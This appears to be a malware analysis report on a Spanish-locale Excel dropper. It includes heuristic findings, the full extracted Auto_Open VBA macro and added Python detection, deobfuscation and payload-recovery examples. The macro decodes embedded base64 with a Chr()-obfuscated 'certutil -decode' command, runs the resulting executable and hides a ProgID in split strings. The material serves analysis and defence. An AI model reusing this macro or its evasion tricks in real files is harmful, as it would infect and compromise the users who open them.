Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5bac7a020f173d6c…

MALICIOUS

Office (OLE)

Size: 1.11 MB
Created: 2016-10-19 22:49:03 (OLE metadata written by the authoring application; trivially editable, so not reliable evidence of when the lure was built)
Authoring application: Microsoft Excel
First seen: 2018-11-05
MD5: 5debb3535cba6615526c64e44d0f5e2b
SHA-1: abaa744d9504c7f23a237f8220ac6a441016d518
SHA-256: 5bac7a020f173d6c35f73d76cd3745a36564dbb3dd32f2d5fc5021c353e76a54
Risk score: 570

Malware Insights

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1140 Deobfuscate/Decode Files or Information (added mapping: the macro turns base64 text it writes to disk into an executable with certutil -decode)

The sample is a legacy-format (OLE/BIFF) Excel workbook whose `Auto_Open` macro runs as soon as the workbook is opened with macros enabled (T1204.002, T1059.005). The `WScript.Shell` object is created only to read the process environment: the macro compares `PROCESSOR_ARCHITECTURE` and `PROCESSOR_ARCHITEW6432` to tell a native 32-bit Windows install from a 64-bit one (32-bit Excel under WOW64 sees `x86` plus a non-empty `PROCESSOR_ARCHITEW6432` and is treated as 64-bit) and calls `SZ54uAck` or `KARlpuHz` accordingly. Each of those concatenates a block of worksheet cells far outside the visible area, rows 47104-47340 of column 177 (FU) or rows 30057-30293 of column 199 (GQ), on the workbook's only sheet, `Hoja1`. Nothing is downloaded: the second stage is embedded in the spreadsheet as base64 text, one build per OS architecture. `cutil` wraps that text in `-----BEGIN CERTIFICATE-----` / `-----END CERTIFICATE-----` markers, writes it through a `Scripting.FileSystemObject` (the ProgID is reassembled from three split literals) to a `.txt` file under `Application.UserLibraryPath`, the user's Excel AddIns folder, using an eight-character name of alternating uppercase letters and digits 1-9 from `rndname`, and then runs `certutil -decode <txt> <exe>` through `Shell()`. That command is built from a `Chr()` chain, so the string `certutil -decode` never appears in the source. Because VBA's `Shell()` returns without waiting for the child, the macro sleeps two seconds for certutil to finish and then executes the decoded `.exe` with a second `Shell()`. The `Shell()` calls, the certutil living-off-the-land decode step and the split-literal ProgID are the strongest indicators of malicious intent; the default sheet name `Hoja1` shows the workbook was authored in a Spanish-locale Excel.
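The process chain above (EXCEL.EXE spawning certutil with -decode on a file in the AddIns folder, then the decoded .exe from the same folder) is what endpoint telemetry sees. The following is an added example, not part of this report or of the analysis tool that produced it: detection logic over constructed Sysmon-style process-creation records. The paths, user name, PIDs and file names are hypothetical; the AddIns location and the rndname letter/digit pattern come from the macro.

```python
import re

# Added example: detection logic for the Excel -> certutil -decode -> .exe chain.
# Not part of the original report. EVENTS are constructed to resemble Sysmon
# Event ID 1 fields; user name, PIDs and file names are hypothetical.

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}

# Application.UserLibraryPath is the user's AddIns folder under %APPDATA%.
ADDINS_DIR_RE = re.compile(r"\\AppData\\Roaming\\Microsoft\\AddIns\\", re.I)
# rndname() in the macro builds 8 chars alternating A-Z and 1-9, letter first.
RNDNAME_RE = re.compile(r"\\(?:[A-Z][1-9]){4}\.(?:txt|exe)$")
DECODE_RE = re.compile(r"(?i)(?:^|\s)-decode\s+(\S+)\s+(\S+)")


def image_name(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return detection labels for one process-creation event (empty = no hit)."""
    parent = image_name(ev["ParentImage"])
    image = image_name(ev["Image"])
    cmd = ev["CommandLine"]
    labels = []
    m = DECODE_RE.search(cmd) if image == "certutil.exe" else None
    if m:
        infile, outfile = m.group(1), m.group(2)
        if parent in OFFICE_PARENTS:
            labels.append("office_spawns_certutil_decode")
        if outfile.lower().endswith(".exe"):
            labels.append("certutil_decode_to_exe")
        if ADDINS_DIR_RE.search(infile) and RNDNAME_RE.search(infile):
            labels.append("addins_rndname_staging")
    if parent in OFFICE_PARENTS and image.endswith(".exe") and ADDINS_DIR_RE.search(ev["Image"]):
        labels.append("office_runs_exe_from_addins")
        if RNDNAME_RE.search(ev["Image"]):
            labels.append("addins_rndname_staging")
    return labels


def scan(events):
    """Map ProcessId -> labels for every event that fires at least one rule."""
    hits = {}
    for ev in events:
        labels = classify(ev)
        if labels:
            hits[ev["ProcessId"]] = labels
    return hits


# Constructed telemetry: one benign Excel start, the dropper chain, one benign certutil use.
ADDINS = r"C:\Users\alice\AppData\Roaming\Microsoft\AddIns"
EXCEL = r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"
EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe", "Image": EXCEL,
     "CommandLine": '"EXCEL.EXE" invoice.xls'},
    {"ProcessId": 4388, "ParentImage": EXCEL, "Image": r"C:\Windows\SysWOW64\certutil.exe",
     "CommandLine": f"certutil -decode {ADDINS}\\K3M7A1Z9.txt {ADDINS}\\B2Q8D4X6.exe"},
    {"ProcessId": 4402, "ParentImage": EXCEL, "Image": f"{ADDINS}\\B2Q8D4X6.exe",
     "CommandLine": f"{ADDINS}\\B2Q8D4X6.exe"},
    {"ProcessId": 5010, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -hashfile setup.msi SHA256"},
]

if __name__ == "__main__":
    for pid, labels in scan(EVENTS).items():
        print(pid, labels)
```

The Office-parent rules are the high-fidelity ones; certutil -decode on its own has legitimate administrative uses, so the bare `certutil_decode_to_exe` label is best treated as hunting input rather than an alert.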

Heuristics (15)

  • ClamAV: Xls.Malware.Valyria-6995973-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-6995973-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
        Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set WshShell = CreateObject("WScript.Shell")
    Set WshProcEnv = WshShell.Environment("Process")
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
        Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set WshShell = CreateObject("WScript.Shell")
    Set WshProcEnv = WshShell.Environment("Process")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found. For this sample the finding is a false positive: the run sits inside printable base64 text, where 'A' encodes a zero sextet, so a long run of 'A' is simply a run of zero bytes (the mostly-empty MZ header of the embedded executable). The bytes that follow the run in the SC_NOP_EQUIV_SLED disassembly below read as ASCII `4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vd`, the familiar base64 of a PE DOS stub ("This program cannot ..."). This is the payload the macro reads out of the worksheet cells, not sprayed shellcode, and the disassembly that follows is of ASCII text with no meaning as code.
    Disassembly
    Attempted x86 opcode disassembly
    0005BC0E  41                inc ecx
    0005BC0F  41                inc ecx
    0005BC10  41                inc ecx
    0005BC11  41                inc ecx
    0005BC12  41                inc ecx
    0005BC13  41                inc ecx
    0005BC14  41                inc ecx
    0005BC15  41                inc ecx
    0005BC16  41                inc ecx
    0005BC17  41                inc ecx
    0005BC18  41                inc ecx
    0005BC19  41                inc ecx
    0005BC1A  41                inc ecx
    0005BC1B  41                inc ecx
    0005BC1C  41                inc ecx
    0005BC1D  41                inc ecx
    0005BC1E  41                inc ecx
    0005BC1F  41                inc ecx
    0005BC20  41                inc ecx
    0005BC21  41                inc ecx
    0005BC22  41                inc ecx
    0005BC23  41                inc ecx
    0005BC24  41                inc ecx
    0005BC25  41                inc ecx
    0005BC26  41                inc ecx
    0005BC27  41                inc ecx
    0005BC28  41                inc ecx
    0005BC29  41                inc ecx
    0005BC2A  41                inc ecx
    0005BC2B  41                inc ecx
    0005BC2C  41                inc ecx
    0005BC2D  41                inc ecx
    0005BC2E  41                inc ecx
    0005BC2F  41                inc ecx
    0005BC30  41                inc ecx
    0005BC31  41                inc ecx
    0005BC32  41                inc ecx
    0005BC33  41                inc ecx
    0005BC34  41                inc ecx
    0005BC35  41                inc ecx
    0005BC36  41                inc ecx
    0005BC37  41                inc ecx
    0005BC38  41                inc ecx
    0005BC39  41                inc ecx
    0005BC3A  41                inc ecx
    0005BC3B  41                inc ecx
    0005BC3C  41                inc ecx
    0005BC3D  41                inc ecx
    0005BC3E  41                inc ecx
    0005BC3F  41                inc ecx
    0005BC40  41                inc ecx
    0005BC41  41                inc ecx
    0005BC42  41                inc ecx
    0005BC43  41                inc ecx
    0005BC44  41                inc ecx
    0005BC45  41                inc ecx
    0005BC46  41                inc ecx
    0005BC47  41                inc ecx
    0005BC48  41                inc ecx
    0005BC49  41                inc ecx
    0005BC4A  41                inc ecx
    0005BC4B  41                inc ecx
    0005BC4C  41                inc ecx
    0005BC4D  41                inc ecx
    0005BC4E  41                inc ecx
    0005BC4F  41                inc ecx
    0005BC50  41                inc ecx
    0005BC51  41                inc ecx
    0005BC52  41                inc ecx
    0005BC53  41                inc ecx
    0005BC54  41                inc ecx
    0005BC55  41                inc ecx
    0005BC56  41                inc ecx
    0005BC57  41                inc ecx
    0005BC58  41                inc ecx
    0005BC59  41                inc ecx
    0005BC5A  41                inc ecx
    0005BC5B  41                inc ecx
    0005BC5C  41                inc ecx
    0005BC5D  41                inc ecx
    0005BC5E  41                inc ecx
    0005BC5F  41                inc ecx
    0005BC60  41                inc ecx
    0005BC61  41                inc ecx
    0005BC62  41                inc ecx
    0005BC63  41                inc ecx
    0005BC64  41                inc ecx
    0005BC65  41                inc ecx
    0005BC66  41                inc ecx
    0005BC67  41                inc ecx
    0005BC68  41                inc ecx
    0005BC69  41                inc ecx
    0005BC6A  41                inc ecx
    0005BC6B  41                inc ecx
    0005BC6C  41                inc ecx
    0005BC6D  41                inc ecx
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x41 bytes. Same data as the SC_HEAP_SPRAY finding above: base64 'A' padding from the embedded executable, not a NOP-equivalent sled. From 0005B8EF onward the bytes are the ASCII text `4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vd`; aligned so that the quartet `AAEA` at 0005B8E9 is one base64 group, it decodes to the tail of e_lfanew (0x100), the DOS stub code `0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21` and the text `This program canno`.
    Disassembly
    Attempted x86 opcode disassembly
    0005B8BA  41                inc ecx
    0005B8BB  41                inc ecx
    0005B8BC  41                inc ecx
    0005B8BD  41                inc ecx
    0005B8BE  41                inc ecx
    0005B8BF  41                inc ecx
    0005B8C0  41                inc ecx
    0005B8C1  41                inc ecx
    0005B8C2  41                inc ecx
    0005B8C3  41                inc ecx
    0005B8C4  41                inc ecx
    0005B8C5  41                inc ecx
    0005B8C6  41                inc ecx
    0005B8C7  41                inc ecx
    0005B8C8  41                inc ecx
    0005B8C9  41                inc ecx
    0005B8CA  41                inc ecx
    0005B8CB  41                inc ecx
    0005B8CC  41                inc ecx
    0005B8CD  41                inc ecx
    0005B8CE  41                inc ecx
    0005B8CF  41                inc ecx
    0005B8D0  41                inc ecx
    0005B8D1  41                inc ecx
    0005B8D2  41                inc ecx
    0005B8D3  41                inc ecx
    0005B8D4  41                inc ecx
    0005B8D5  41                inc ecx
    0005B8D6  41                inc ecx
    0005B8D7  41                inc ecx
    0005B8D8  41                inc ecx
    0005B8D9  41                inc ecx
    0005B8DA  41                inc ecx
    0005B8DB  41                inc ecx
    0005B8DC  41                inc ecx
    0005B8DD  41                inc ecx
    0005B8DE  41                inc ecx
    0005B8DF  41                inc ecx
    0005B8E0  41                inc ecx
    0005B8E1  41                inc ecx
    0005B8E2  41                inc ecx
    0005B8E3  41                inc ecx
    0005B8E4  41                inc ecx
    0005B8E5  41                inc ecx
    0005B8E6  41                inc ecx
    0005B8E7  41                inc ecx
    0005B8E8  41                inc ecx
    0005B8E9  41                inc ecx
    0005B8EA  41                inc ecx
    0005B8EB  45                inc ebp
    0005B8EC  41                inc ecx
    0005B8ED  41                inc ecx
    0005B8EE  41                inc ecx
    0005B8EF  3466              xor al, 0x66
    0005B8F1  7567              jne 0x5b95a
    0005B8F3  3441              xor al, 0x41
    0005B8F5  7441              je 0x5b938
    0005B8F7  6e                outsb dx, byte ptr [esi]
    0005B8F8  4e                dec esi
    0005B8F9  49                dec ecx
    0005B8FA  626742            bound esp, qword ptr [edi + 0x42]
    0005B8FD  54                push esp
    0005B8FE  4d                dec ebp
    0005B8FF  306856            xor byte ptr [eax + 0x56], ch
    0005B902  47                inc edi
    0005B903  6870637942        push 0x42796370
    0005B908  7763              ja 0x5b96d
    0005B90A  6d                insd dword ptr es:[edi], dx
    0005B90B  396e63            cmp dword ptr [esi + 0x63], ebp
    0005B90E  6d                insd dword ptr es:[edi], dx
    0005B90F  46                inc esi
    0005B910  7449              je 0x5b95b
    0005B912  47                inc edi
    0005B913  4e                dec esi
    0005B914  68626d3576        push 0x76356d62
    0005B919  64                .byte 0x64
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the DrawingML XML namespace URI that Office writes into documents carrying drawing or shape data; it is a static schema identifier, not a network indicator, and is expected in benign files.
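The OLE_VBA_SPLIT_KEYWORD_OBFUSCATION and OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER findings above both hinge on normalising the macro text before keyword matching. The following is an added example of that normalisation in Python, not the report's own matcher (whose internals are not shown here): Chr() calls become literals, adjacent literals joined with & or + (including across _ line continuations) are spliced, and the literals that exist only after normalisation are checked against a watch list. SAMPLE_VBA is copied from the extracted macro below; the watch list is an assumption.

```python
import re

# Added example: static string deobfuscation for Chr() chains and split literals.
# Not part of the original report. SAMPLE_VBA is taken from the extracted macro.

CHR_RE = re.compile(r"\bChr[WB]?\(\s*(\d+)\s*\)", re.I)
# A VBA string literal ("" is an escaped quote), or a run of non-literal text.
TOKEN_RE = re.compile(r'"(?:[^"\r\n]|"")*"|[^"]+|"')
# Text allowed between two literals for them to be one string: & or +,
# optionally followed by a _ line continuation and the next line's indent.
GLUE_RE = re.compile(r"\s*[&+]\s*(?:_\s*)?")
WATCH = ("certutil", "-decode", "scripting.filesystemobject", "wscript.shell",
         "powershell", "urldownloadtofile", "certificate")


def tokenize(vba):
    """Split VBA text into ('lit', '"..."') and ('raw', text) tokens."""
    return [("lit" if t.startswith('"') and len(t) >= 2 else "raw", t)
            for t in TOKEN_RE.findall(vba)]


def resolve_chr(vba):
    """Chr(99) -> "c": turn numeric character calls into ordinary literals."""
    return CHR_RE.sub(lambda m: '"' + chr(int(m.group(1))).replace('"', '""') + '"', vba)


def join_literals(vba):
    """Merge "a" & "b" and "a" + "b" into "ab"; any other operand stops the merge."""
    out = []
    for kind, tok in tokenize(vba):
        if (kind == "lit" and len(out) >= 2 and out[-2][0] == "lit"
                and out[-1][0] == "raw" and GLUE_RE.fullmatch(out[-1][1])):
            out.pop()                               # drop the glue
            out[-1][1] = out[-1][1][:-1] + tok[1:]  # splice: drop closing and opening quotes
        else:
            out.append([kind, tok])
    return "".join(t for _, t in out)


def deobfuscate(vba):
    return join_literals(resolve_chr(vba))


def literals(vba):
    return [t[1:-1].replace('""', '"') for k, t in tokenize(vba) if k == "lit"]


def reassembled_indicators(vba):
    """Literals that exist only after normalisation and contain a watched token.
    Dropping literals already present verbatim isolates the reassembled ones."""
    before = set(literals(vba))
    found = []
    for lit in literals(deobfuscate(vba)):
        hits = [w for w in WATCH if w in lit.lower()]
        if lit not in before and hits:
            found.append((lit, hits))
    return found


SHELL_LINE = ('Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _\n'
              '    Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)')
SAMPLE_VBA = '''\
    x = "-----BEG" & "IN CER" & "TIFICATE-----"
    x = x + vbNewLine
    x = x + code
    x = x + "-----E" & "ND CERTIF" & "ICATE-----"
    path = Application.UserLibraryPath & rndname & ".txt"
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
    ''' + SHELL_LINE + "\n"

if __name__ == "__main__":
    print(deobfuscate(SHELL_LINE))
    for lit, hits in reassembled_indicators(SAMPLE_VBA):
        print(repr(lit), hits)
```

The merge deliberately stops at non-literal operands, so `"certutil -decode " & path & " " & expath` survives with the variable references intact; that is enough to see the command shape without emulating the whole macro.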

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2872 bytes
SHA-256: 55142ee8bd68b0ee109696c52de3bc243b3d976ca1a46c8e846e4e58dc66a206
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "LinesOfBusiness"

#If VBA7 Then
    Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
#Else
    Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If

Sub Auto_Open()

Dim WshShell
Dim WshProcEnv
Dim isx86
Dim process_architecture

Set WshShell = CreateObject("WScript.Shell")
Set WshProcEnv = WshShell.Environment("Process")

process_architecture = WshProcEnv("PROCESSOR_ARCHITECTURE")

If process_architecture = "x86" Then
    isx86 = WshProcEnv("PROCESSOR_ARCHITEW6432")
    If isx86 = "" Then
        isx86 = True
    Else
        isx86 = False
    End If
Else
    isx86 = False
End If
If (isx86) Then
    Call LinesOfBusiness.SZ54uAck
Else
    Call LinesOfBusiness.KARlpuHz
End If

End Sub


Function GetVal(sr As Long, er As Long, c As Long)
    Dim x
    For i = sr To er
        x = x + Cells(i, c)
    Next
    GetVal = x
End Function


Function rndname()
    Dim r As String
    Dim i As Integer
     
    For i = 1 To 8
        If i Mod 2 = 0 Then
            r = Chr(Int((90 - 65 + 1) * Rnd + 65)) & r
        Else
            r = Int((9 * Rnd) + 1) & r
        End If
    Next i
    rndname = r
End Function


Sub cutil(code As String)
    Dim x As String
    
    x = "-----BEG" & "IN CER" & "TIFICATE-----"
    x = x + vbNewLine
    x = x + code
    x = x + vbNewLine
    x = x + "-----E" & "ND CERTIF" & "ICATE-----"
    
    Dim path As String
    path = Application.UserLibraryPath & rndname & ".txt"
    expath = Application.UserLibraryPath & rndname & ".exe"
    
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
    Set file = scr.CreateTextFile(path, True)
    file.Write x
    file.Close

    Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
    Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
    Sleep 2000
    Shell (expath)
End Sub


Sub SZ54uAck()
    Dim p As String
    p = GetVal(47104, 47340, 177)
    cutil (p)
End Sub


Sub KARlpuHz()
    Dim p As String
    p = GetVal(30057, 30293, 199)
    cutil (p)
End Sub
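The macro never runs a downloader: the payload is the base64 text in the worksheet cells, and certutil -decode turns it into a PE. The following added example (not part of the original report) reproduces the cutil chain without executing anything: GetVal-style concatenation, the PEM wrapper, a certutil-equivalent decode and a PE header check. The workbook and the PE-shaped blobs are constructed stand-ins for the real cells and payloads; for a real sample the cell ranges named in SZ54uAck and KARlpuHz would be read from the .xls with a BIFF reader such as xlrd and passed to recover(). It also decodes PAGE_FRAGMENT, the ASCII of the bytes printed in the SC_NOP_EQUIV_SLED disassembly, at all four base64 alignments to show that the bytes behind the heap-spray and NOP-sled findings are the DOS stub of that PE.

```python
import base64
import hashlib
import re
import struct

# Added example: recover the embedded executable the way cutil() does, offline.
# Not part of the original report. WORKBOOK and fake_pe() are constructed data.


def get_val(cells, sr, er, c):
    """Mirror of the macro's GetVal: concatenate rows sr..er of column c (empty cells add nothing)."""
    return "".join(cells.get((r, c), "") for r in range(sr, er + 1))


def wrap_pem(body):
    """What cutil() writes to the .txt file before calling certutil."""
    return "-----BEGIN CERTIFICATE-----\n" + body + "\n-----END CERTIFICATE-----"


def certutil_decode(text):
    """certutil -decode equivalent: drop the PEM markers, base64-decode the body ignoring whitespace."""
    body = re.sub(r"-----(?:BEGIN|END) CERTIFICATE-----", "", text)
    return base64.b64decode(re.sub(r"\s+", "", body))


MACHINES = {0x14C: "x86", 0x8664: "x64"}


def pe_summary(blob):
    """Cheap PE sanity check on decoded bytes: MZ, e_lfanew -> 'PE\\0\\0', COFF machine, hash."""
    if blob[:2] != b"MZ" or len(blob) < 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(blob) < e_lfanew + 6:
        return None
    machine = struct.unpack_from("<H", blob, e_lfanew + 4)[0]
    return {"e_lfanew": e_lfanew, "machine": MACHINES.get(machine, hex(machine)),
            "sha256": hashlib.sha256(blob).hexdigest()}


def recover(cells, sr, er, c):
    """The whole chain: GetVal -> PEM wrap -> certutil decode -> PE check."""
    return pe_summary(certutil_decode(wrap_pem(get_val(cells, sr, er, c))))


def decode_any_alignment(fragment):
    """A carved base64 fragment rarely starts on a 4-char boundary: decode all four alignments."""
    out = {}
    for off in range(4):
        s = fragment[off:]
        out[off] = base64.b64decode(s[:len(s) // 4 * 4])
    return out


# --- constructed demo data ---------------------------------------------------
DOS_STUB = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
            b"This program cannot be run in DOS mode.\r\r\n$")
PE_OFFSET = 0xA0


def fake_pe(machine):
    """Minimal PE-shaped bytes (not runnable): MZ header, e_lfanew, DOS stub, PE signature, machine."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, PE_OFFSET)
    body = (bytes(hdr) + DOS_STUB).ljust(PE_OFFSET, b"\0")
    return body + b"PE\0\0" + struct.pack("<H", machine) + b"\0" * 18


def embed(cells, blob, sr, c, width=64):
    """Store base64(blob) down column c from row sr, width chars per cell; returns the last row used."""
    b64 = base64.b64encode(blob).decode()
    chunks = [b64[i:i + width] for i in range(0, len(b64), width)]
    for i, chunk in enumerate(chunks):
        cells[(sr + i, c)] = chunk
    return sr + len(chunks) - 1


WORKBOOK = {}
embed(WORKBOOK, fake_pe(0x14C), 47104, 177)   # the range SZ54uAck reads (native 32-bit OS)
embed(WORKBOOK, fake_pe(0x8664), 30057, 199)  # the range KARlpuHz reads (64-bit OS)

# ASCII of the bytes at 0005B8E8..0005B919 in the SC_NOP_EQUIV_SLED disassembly above.
PAGE_FRAGMENT = "AAAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vd"

if __name__ == "__main__":
    print("x86 build:", recover(WORKBOOK, 47104, 47340, 177))
    print("x64 build:", recover(WORKBOOK, 30057, 30293, 199))
    for off, data in decode_any_alignment(PAGE_FRAGMENT).items():
        print(off, data)
```

A run of n 'A' characters in base64 is 3n/4 zero bytes, which is why the mostly-empty MZ header of a PE trips heap-spray and NOP-sled heuristics that operate on raw bytes; checking whether a flagged region is printable base64 before trusting such a finding is cheap, and decoding it recovers the payload hash without ever launching certutil.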